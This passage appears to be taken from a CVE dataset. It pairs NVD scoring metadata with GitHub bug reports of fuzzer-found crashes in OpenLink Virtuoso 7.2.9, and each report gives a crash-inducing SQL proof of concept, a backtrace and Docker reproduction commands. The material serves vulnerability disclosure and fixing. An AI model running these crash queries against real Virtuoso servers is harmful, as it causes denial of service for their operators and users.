"url": "https://github.com/openlink/virtuoso-opensource/issues/1121"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/openlink/virtuoso-opensource/issues/1121 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
CREATE TABLE t1 (c1 INT, c2 BINARY(100),c3 FLOAT);
INSERT INTO t1 VALUES (100,'abcdefghij',3.0);
CREATE TABLE t2 (c1 INT, c2 VARCHAR(100));
INSERT INTO t2 VALUES (2,'abcde');
UPDATE t1 SET c2 = (SELECT MAX(c1) FROM t2);
```
backtrace:
```c
#0 0x7fd63dbe3a7d (__nss_database_lookup+0x2861d)
#1 0xffffffffffffffff -- no symbol name found
```
ways to reproduce (write poc to the file '/tmp/test.sql' first):
```bash
# remove the old one
docker container rm virtdb_test -f
# start virtuoso through docker
docker run --name virtdb_test -itd --env DBA_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.9
# wait the server starting
sleep 10
# check whether the simple query works
echo "SELECT 1;" | docker exec -i virtdb_test isql 1111 dba
# run the poc
docker exec -i virtdb_test isql 1111 dba < "/tmp/test.sql"
``` | virtuoso 7.2.9 crashed at __nss_database_lookup | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1121/comments | 0 | 2023-04-12T18:46:15Z | 2023-04-17T09:13:45Z | https://github.com/openlink/virtuoso-opensource/issues/1121 | 1,665,069,177 | 1,121 | 5,132 |
CVE-2023-31614 | 2023-05-15T15:15:11.913 | An issue in the mp_box_deserialize_string function in openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) after running a SELECT statement. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1117"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1117"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/openlink/virtuoso-opensource/issues/1117 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | ## Description
When running the following statement on an empty virtuoso-opensource database, the database just crashed:
```sql
SELECT table_name as name, 'TABLE' as type, '' as parentname FROM information_schema.tables
UNION
SELECT column_name as name, data_type as type, table_name as parentname FROM information_schema.columns
```
## The Way to Reproduce
Just running the following command to reproduce the crash:
```bash
docker run --name virtdb -itd --env DBA_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.9 # start virtuoso through docker
sleep 10 # wait the server starting
echo "SELECT 1;" | docker exec -i virtdb isql 1111 dba # check whether the simple query works
# The command to crash virtuoso
echo "SELECT table_name as name, 'TABLE' as type, '' as parentname FROM information_schema.tables UNION SELECT column_name as name, data_type as type, table_name as parentname FROM information_schema.columns;" | docker exec -i virtdb isql 1111 dba
```
the output in shell:
```
OpenLink Virtuoso Interactive SQL (Virtuoso)
Version 07.20.3236 as of Feb 27 2023
Type HELP; for help and EXIT; to exit.
Connected to OpenLink Virtuoso
Driver: 07.20.3236 OpenLink Virtuoso ODBC Driver
SQL>
*** Error 08S01: [Virtuoso Driver]CL065: Lost connection to server
at line 1 of Top-Level:
SELECT table_name as name, 'TABLE' as type, '' as parentname FROM information_schema.tables UNION SELECT column_name as name, data_type as type, table_name as parentname FROM information_schema.columns
```
You can see the error "Lost connection to server", and the container is stopped due to the abnormal exit of the virtuoso instance.
## Backtrace
The backtrace when crash is as follow. I compiled virtuoso-opensource 7.2.9 with debug mode to get it.
```
Thread 8 "virtuoso-t" received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x7fffdfdb4700 (LWP 1440941)]
0x00000000005533b6 in mp_box_deserialize_string (mp=0x7fffc806bfc0,
text=0xe34ce1f37a6c3a64 <error: Cannot access memory at address 0xe34ce1f37a6c3a64>, opt_len=2147483647, offset=0) at regist.c:292
292 switch ((dtp_t)text[0])
(gdb) bt
#0 0x00000000005533b6 in mp_box_deserialize_string (mp=0x7fffc806bfc0,
text=0xe34ce1f37a6c3a64 <error: Cannot access memory at address 0xe34ce1f37a6c3a64>, opt_len=2147483647, offset=0) at regist.c:292
#1 0x0000000000427b34 in cha_box_col (cha=0x7fffec416108, ha=0x7fffc8025bf0, row=0x7fffec424720 "k9\241\220(\230\310\r", inx=3)
at chash.c:2320
#2 0x00000000004253f1 in chash_to_memcache (inst=0x7fffc802b2f8, tree=0x7fffc802a158, ha=0x7fffc8025bf0) at chash.c:2364
#3 0x00000000004278e4 in setp_chash_distinct (setp=0x7fffc8025970, inst=0x7fffc802b2f8) at chash.c:2292
#4 0x0000000000593df7 in setp_node_run (setp=0x7fffc8025970, inst=0x7fffc802b2f8, state=0x7fffc802b2f8, print_blobs=0) at sort.c:385
#5 0x00000000005948c7 in setp_node_input (setp=0x7fffc8025970, inst=0x7fffc802b2f8, state=0x7fffc802b2f8) at sort.c:606
#6 0x00000000006bb4e3 in qn_input (xx=0x7fffc8025970, inst=0x7fffc802b2f8, state=0x7fffc802b2f8) at sqlrun.c:982
#7 0x00000000006bb74a in qn_send_output (src=0x7fffc8024ae0, state=0x7fffc802b2f8) at sqlrun.c:1028
#8 0x000000000042b6f8 in hash_source_chash_input (hs=0x7fffc8024ae0, inst=0x7fffc802b2f8, state=0x7fffc802b2f8) at chash.c:3233
#9 0x00000000004d268c in hash_source_input (hs=0x7fffc8024ae0, qst=0x7fffc802b2f8, qst_cont=0x7fffc802b2f8) at hash.c:2613
#10 0x00000000006bb4e3 in qn_input (xx=0x7fffc8024ae0, inst=0x7fffc802b2f8, state=0x7fffc802b2f8) at sqlrun.c:982
#11 0x00000000006bb8e6 in qn_ts_send_output (src=0x7fffc8024400, state=0x7fffc802b2f8, after_join_test=0x0) at sqlrun.c:1059
#12 0x00000000006bf39f in table_source_input (ts=0x7fffc8024400, inst=0x7fffc802b2f8, state=0x7fffc802b2f8) at sqlrun.c:1991
#13 0x00000000006bb4e3 in qn_input (xx=0x7fffc8024400, inst=0x7fffc802b2f8, state=0x7fffc802b2f8) at sqlrun.c:982
#14 0x00000000006bb8e6 in qn_ts_send_output (src=0x7fffc80235b0, state=0x7fffc802b2f8, after_join_test=0x0) at sqlrun.c:1059
#15 0x00000000006bf39f in table_source_input (ts=0x7fffc80235b0, inst=0x7fffc802b2f8, state=0x7fffc802b2f8) at sqlrun.c:1991
#16 0x00000000006bb4e3 in qn_input (xx=0x7fffc80235b0, inst=0x7fffc802b2f8, state=0x7fffc802b2f8) at sqlrun.c:982
#17 0x0000000000594e55 in union_node_input (un=0x7fffc800f5d0, inst=0x7fffc802b2f8, state=0x7fffc802b2f8) at sort.c:672
#18 0x000000000066c60f in qr_resume_pending_nodes (subq=0x7fffc8020680, inst=0x7fffc802b2f8) at sqlintrp.c:1185
#19 0x000000000066c923 in subq_next (subq=0x7fffc8020680, inst=0x7fffc802b2f8, cr_state=2) at sqlintrp.c:1243
#20 0x000000000070e52c in subq_node_vec_input (sqs=0x7fffc801dbc0, inst=0x7fffc802b2f8, state=0x0) at sqlvnode.c:702
#21 0x0000000000594a8b in subq_node_input (sqs=0x7fffc801dbc0, inst=0x7fffc802b2f8, state=0x7fffc802b2f8) at sort.c:691
#22 0x00000000006bb4e3 in qn_input (xx=0x7fffc801dbc0, inst=0x7fffc802b2f8, state=0x7fffc802b2f8) at sqlrun.c:982
#23 0x00000000006bb74a in qn_send_output (src=0x7fffc80202b0, state=0x7fffc802b2f8) at sqlrun.c:1028
#24 0x0000000000439b1a in chash_fill_input (fref=0x7fffc80202b0, inst=0x7fffc802b2f8, state=0x7fffc802b2f8) at chash.c:6013
#25 0x00000000004d3c05 in hash_fill_node_input (fref=0x7fffc80202b0, inst=0x7fffc802b2f8, qst=0x7fffc802b2f8) at hash.c:3253
#26 0x00000000006bb4e3 in qn_input (xx=0x7fffc80202b0, inst=0x7fffc802b2f8, state=0x7fffc802b2f8) at sqlrun.c:982
#27 0x00000000006bb74a in qn_send_output (src=0x7fffc8027e30, state=0x7fffc802b2f8) at sqlrun.c:1028
#28 0x000000000070e189 in set_ctr_vec_input (sctr=0x7fffc8027e30, inst=0x7fffc802b2f8, state=0x7fffc802b2f8) at sqlvnode.c:632
#29 0x0000000000596fb4 in set_ctr_input (sctr=0x7fffc8027e30, inst=0x7fffc802b2f8, state=0x7fffc802b2f8) at sort.c:1319
#30 0x00000000006bb4e3 in qn_input (xx=0x7fffc8027e30, inst=0x7fffc802b2f8, state=0x7fffc802b2f8) at sqlrun.c:982
#31 0x00000000006c791e in qr_exec (cli=0x7fffc8000e30, qr=0x7fffc801a380, caller=0x2, cr_name=0x7fffc802bdf8 "s1111_1_0", stmt=0x7fffc8018b30,
lc_ret=0x0, parms=0x7fffd4021de8, opts=0x7fffd4021f08, named_params=0) at sqlrun.c:4344
#32 0x00000000006d1f5b in sf_sql_execute (stmt_id=0x7fffd4021e08 "s1111_1_0", text=0x72e2658 "\320\b", cursor_name=0x7fffd4021ec8 "s1111_1_0",
params=0x7fffd4021ea8, current_ofs=0x7fffd4021dc8, options=0x7fffd4021f08) at sqlsrv.c:2006
#33 0x00000000006d26fe in sf_sql_execute_w (stmt_id=0x7fffd4021e08 "s1111_1_0", text=0x72e2658 "\320\b",
cursor_name=0x7fffd4021ec8 "s1111_1_0", params=0x7fffd4021ea8, current_ofs=0x7fffd4021dc8, options=0x7fffd4021f08) at sqlsrv.c:2049
#34 0x00000000006d9620 in sf_sql_execute_wrapper (args=0x7fffdfdb3e30) at sqlsrv.c:3995
#35 0x0000000000b777f6 in future_wrapper (ignore=0x0) at Dkernel.c:1171
#36 0x0000000000b7da94 in _thread_boot (arg=0x7fffd4011370) at sched_pthread.c:296
#37 0x00007ffff7c3a609 in start_thread (arg=<optimized out>) at pthread_create.c:477
--Type <RET> for more, q to quit, c to continue without paging--
#38 0x00007ffff7a0a133 in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:95
``` | virtuoso *crashed* after running a SELECT statement | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1117/comments | 2 | 2023-04-10T17:55:59Z | 2023-04-17T09:13:46Z | https://github.com/openlink/virtuoso-opensource/issues/1117 | 1,661,128,936 | 1,117 | 5,133 |
CVE-2023-31615 | 2023-05-15T15:15:11.963 | An issue in the chash_array component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1124"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1124"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/openlink/virtuoso-opensource/issues/1124 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
CREATE TABLE t1(x INTEGER UNIQUE);
CREATE TABLE k(v varchar(255), excluded varchar(255));
INSERT INTO t1(x, x, x, x, x, x, x) VALUES(16183,15638,6,0,5,2,0);
SELECT 'one', t1.* FROM t1 LEFT JOIN k ON t1.x=k.v WHERE k.v IS NULL;
```
backtrace:
```c
#0 0x4257c4 (chash_array+0x834)
#1 0x43932f (hash_source_chash_input+0x6df)
#2 0x7ac43e (qn_input+0x3ce)
#3 0x7ac8a6 (qn_send_output+0x236)
#4 0x81e26d (set_ctr_vec_input+0x94d)
#5 0x7ac43e (qn_input+0x3ce)
#6 0x7acb6f (qn_ts_send_output+0x23f)
#7 0x7b247e (table_source_input+0x16ee)
#8 0x7ac43e (qn_input+0x3ce)
#9 0x7ac8a6 (qn_send_output+0x236)
#10 0x44c34e (chash_fill_input+0x13e)
#11 0x535d6f (hash_fill_node_input+0xef)
#12 0x7ac43e (qn_input+0x3ce)
#13 0x7ac8a6 (qn_send_output+0x236)
#14 0x81e26d (set_ctr_vec_input+0x94d)
#15 0x7ac43e (qn_input+0x3ce)
#16 0x7bdc6e (qr_exec+0x11ee)
#17 0x7cb446 (sf_sql_execute+0x11a6)
#18 0x7cbf4e (sf_sql_execute_w+0x17e)
#19 0x7d4c0d (sf_sql_execute_wrapper+0x3d)
#20 0xe1f01c (future_wrapper+0x3fc)
#21 0xe2691e (_thread_boot+0x11e)
#22 0x7fac44860609 (start_thread+0xd9)
#23 0x7fac44630133 (clone+0x43)
```
ways to reproduce (write poc to the file '/tmp/test.sql' first):
```bash
# remove the old one
docker container rm virtdb_test -f
# start virtuoso through docker
docker run --name virtdb_test -itd --env DBA_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.9
# wait the server starting
sleep 10
# check whether the simple query works
echo "SELECT 1;" | docker exec -i virtdb_test isql 1111 dba
# run the poc
docker exec -i virtdb_test isql 1111 dba < "/tmp/test.sql"
``` | virtuoso 7.2.9 crashed at chash_array | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1124/comments | 0 | 2023-04-12T18:50:37Z | 2023-04-14T12:55:18Z | https://github.com/openlink/virtuoso-opensource/issues/1124 | 1,665,074,357 | 1,124 | 5,134 |
CVE-2023-31616 | 2023-05-15T15:15:12.010 | An issue in the bif_mod component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1122"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1122"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/openlink/virtuoso-opensource/issues/1122 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
SELECT MOD(-9223372036854775808, -1);
```
backtrace:
```c
#0 0x66a32e (bif_mod+0xce)
#1 0x74ae62 (sqlr_run_bif_in_sandbox+0x392)
#2 0x79b598 (sqlp_patch_call_if_special_or_optimizable+0x1148)
#3 0xccffe7 (scn3yyparse+0xc5d7)
#4 0x6b995b (sql_compile_1+0x129b)
#5 0x7c8cd0 (stmt_set_query+0x340)
#6 0x7cabc2 (sf_sql_execute+0x922)
#7 0x7cbf4e (sf_sql_execute_w+0x17e)
#8 0x7d4c0d (sf_sql_execute_wrapper+0x3d)
#9 0xe1f01c (future_wrapper+0x3fc)
#10 0xe2691e (_thread_boot+0x11e)
#11 0x7f1cfacc6609 (start_thread+0xd9)
#12 0x7f1cfaa96133 (clone+0x43)
```
ways to reproduce (write poc to the file '/tmp/test.sql' first):
```bash
# remove the old one
docker container rm virtdb_test -f
# start virtuoso through docker
docker run --name virtdb_test -itd --env DBA_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.9
# wait the server starting
sleep 10
# check whether the simple query works
echo "SELECT 1;" | docker exec -i virtdb_test isql 1111 dba
# run the poc
docker exec -i virtdb_test isql 1111 dba < "/tmp/test.sql"
``` | virtuoso 7.2.9 crashed at bif_mod | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1122/comments | 0 | 2023-04-12T18:47:44Z | 2023-04-14T08:12:11Z | https://github.com/openlink/virtuoso-opensource/issues/1122 | 1,665,070,884 | 1,122 | 5,135 |
CVE-2023-31617 | 2023-05-15T15:15:12.057 | An issue in the dk_set_delete component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1127"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1127"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/openlink/virtuoso-opensource/issues/1127 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
CREATE TABLE b (
folders VARCHAR(80),
folderid VARCHAR(80),
parentid VARCHAR(80),
rootid VARCHAR(80),
c INTEGER,
path VARCHAR(80),
id VARCHAR(80),
i VARCHAR(80),
d VARCHAR(80),
e VARCHAR(80),
f VARCHAR(80)
);
SELECT -(coalesce((select max(coalesce((select b.f from b where not exists(select 1 from b where (abs(+rootid+19+19)/abs(b.rootid))<b.rootid) or 19+f>=(select -max(19) from b)+b.f),b.e+b.f)* -b.e+19-f) from b where (( -b.id<19) or d>=id)),b.id))*id*((b.rootid))-17 FROM b WHERE NOT (b.e not between b.f*id and b.f+ -d);
```
backtrace:
```c
#0 0xe05b99 (dk_set_delete+0x39)
#1 0x7ff2b5 (sqlg_vec_qns+0x365)
#2 0x7fcfc7 (cv_vec_slots+0x947)
#3 0x7fc563 (sqlg_vec_after_test+0x1b3)
#4 0x80148f (qn_vec_slots+0x61f)
#5 0x7ff412 (sqlg_vec_qns+0x4c2)
#6 0x81464c (sqlg_vector_subq+0xdc)
#7 0x814d91 (sqlg_vector+0x61)
#8 0x6baa15 (sql_compile_1+0x2355)
#9 0x7c8cd0 (stmt_set_query+0x340)
#10 0x7cabc2 (sf_sql_execute+0x922)
#11 0x7cbf4e (sf_sql_execute_w+0x17e)
#12 0x7d4c0d (sf_sql_execute_wrapper+0x3d)
#13 0xe1f01c (future_wrapper+0x3fc)
#14 0xe2691e (_thread_boot+0x11e)
#15 0x7fc16f67c609 (start_thread+0xd9)
#16 0x7fc16f44c133 (clone+0x43)
#0 0xe10319 (gpf_notice+0x209)
#1 0xde599f (dk_free_box+0x2df)
#2 0x6b35cc (fun_ref_free+0x4c)
#3 0x50498d (qr_free+0x2ad)
#4 0x504a1c (qr_free+0x33c)
#5 0x504a1c (qr_free+0x33c)
#6 0x504a1c (qr_free+0x33c)
#7 0x504a1c (qr_free+0x33c)
#8 0x7c4def (cli_scrap_cached_statements+0x41f)
#9 0x7c53f5 (client_connection_free+0x265)
#10 0x7c6365 (srv_client_connection_died+0x205)
#11 0x7c652d (srv_client_session_died+0x2d)
#12 0xe14dff (session_is_dead+0x6f)
#13 0xe1f3d0 (future_wrapper+0x7b0)
#14 0xe2691e (_thread_boot+0x11e)
#15 0x7fefc040b609 (start_thread+0xd9)
#16 0x7fefc01db133 (clone+0x43)
```
ways to reproduce (write poc to the file '/tmp/test.sql' first):
```bash
# remove the old one
docker container rm virtdb_test -f
# start virtuoso through docker
docker run --name virtdb_test -itd --env DBA_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.9
# wait the server starting
sleep 10
# check whether the simple query works
echo "SELECT 1;" | docker exec -i virtdb_test isql 1111 dba
# run the poc
docker exec -i virtdb_test isql 1111 dba < "/tmp/test.sql"
``` | virtuoso 7.2.9 crashed at dk_set_delete | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1127/comments | 0 | 2023-04-12T19:01:25Z | 2023-04-14T08:12:12Z | https://github.com/openlink/virtuoso-opensource/issues/1127 | 1,665,089,526 | 1,127 | 5,136 |
CVE-2023-31618 | 2023-05-15T15:15:12.110 | An issue in the sqlc_union_dt_wrap component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1136"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1136"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/openlink/virtuoso-opensource/issues/1136 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
SELECT SUM(v), COUNT(*) FROM gstest_empty
UNION ALL
SELECT SUM(v), NULL FROM gstest_empty
UNION ALL
SELECT NULL, COUNT(*) FROM gstest_empty
UNION ALL
SELECT NULL, NULL
```
backtrace:
```c
#0 0x81a65e (sqlc_union_dt_wrap+0x5e)
#1 0x81a783 (sqlc_union_order+0x33)
#2 0x6b6f11 (sql_stmt_comp+0x511)
#3 0x6ba122 (sql_compile_1+0x1a62)
#4 0x7c8cd0 (stmt_set_query+0x340)
#5 0x7cabc2 (sf_sql_execute+0x922)
#6 0x7cbf4e (sf_sql_execute_w+0x17e)
#7 0x7d4c0d (sf_sql_execute_wrapper+0x3d)
#8 0xe1f01c (future_wrapper+0x3fc)
#9 0xe2691e (_thread_boot+0x11e)
#10 0x7f5244ae3609 (start_thread+0xd9)
#11 0x7f52448b3133 (clone+0x43)
```
ways to reproduce (write poc to the file '/tmp/test.sql' first):
```bash
# remove the old one
docker container rm virtdb_test -f
# start virtuoso through docker
